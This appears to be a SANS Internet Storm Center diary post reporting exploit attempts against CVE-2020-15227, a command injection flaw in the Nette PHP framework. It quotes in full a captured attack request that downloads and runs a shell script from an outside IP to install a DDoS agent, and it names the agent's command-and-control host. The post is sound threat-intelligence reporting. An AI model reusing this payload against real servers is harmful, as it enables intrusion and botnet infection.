Attacks against the "Nette" PHP framework CVE-2020-15227

    Published: 2024-07-12
    Last Updated: 2024-07-12 15:58:58 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Today, I noticed some exploit attempts against an older vulnerability in the "Nette Framework", CVE-2020-15227 [1].

    Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

    Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

     /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

    Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 

    The malware was written in Go, and Virustotal's "Behaviour" analysis does a pretty good job in summarizing the binary.

    • The binary uses crontab and systemd for persistence.
    • it uses sosbot.icu on port 1314 for command and control
    •  

    [1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
    [2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    Keywords:
    0 comment(s)
    ISC Stormcast For Friday, July 12th, 2024 https://isc.sans.edu/podcastdetail/9050

      Comments


      Diary Archives